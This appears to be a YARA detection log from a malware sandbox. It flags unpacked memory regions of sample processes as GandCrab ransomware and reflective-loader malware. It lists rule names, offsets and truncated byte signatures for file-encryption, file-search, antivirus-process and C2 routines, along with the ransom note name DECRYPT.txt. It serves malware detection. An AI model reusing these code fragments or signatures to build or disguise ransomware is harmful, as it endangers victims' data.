13.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
28.3.wzltxa.exe.38a0000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
28.3.wzltxa.exe.38a0000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
28.3.wzltxa.exe.38a0000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
28.3.wzltxa.exe.38a0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
28.3.wzltxa.exe.38a0000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
28.3.wzltxa.exe.38a0000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0.3.mPNVrHIpyt.exe.3e00000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
0.3.mPNVrHIpyt.exe.3e00000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
0.3.mPNVrHIpyt.exe.3e00000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.3.mPNVrHIpyt.exe.3e00000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
0.3.mPNVrHIpyt.exe.3e00000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.3.mPNVrHIpyt.exe.3e00000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
30.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
30.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
30.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
30.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
31.3.wzltxa.exe.3b90000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
31.3.wzltxa.exe.3b90000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
31.3.wzltxa.exe.3b90000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
31.3.wzltxa.exe.3b90000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
31.3.wzltxa.exe.3b90000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
31.3.wzltxa.exe.3b90000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
11.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
11.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
11.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
11.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
11.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
11.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
11.3.wzltxa.exe.3940000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
11.3.wzltxa.exe.3940000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
11.3.wzltxa.exe.3940000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
11.3.wzltxa.exe.3940000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
11.3.wzltxa.exe.3940000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.3.wzltxa.exe.3940000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
12.3.wzltxa.exe.3b20000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.3.wzltxa.exe.3b20000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.3.wzltxa.exe.3b20000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.3.wzltxa.exe.3b20000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.3.wzltxa.exe.3b20000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.3.wzltxa.exe.3b20000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
39.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
39.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
39.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
39.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
39.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
39.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
39.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
15.3.wzltxa.exe.2fa0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
15.3.wzltxa.exe.2fa0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
15.3.wzltxa.exe.2fa0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.3.wzltxa.exe.2fa0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
15.3.wzltxa.exe.2fa0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.3.wzltxa.exe.2fa0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
22.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
22.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
22.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
22.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
22.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
22.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
12.3.wzltxa.exe.3b20000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
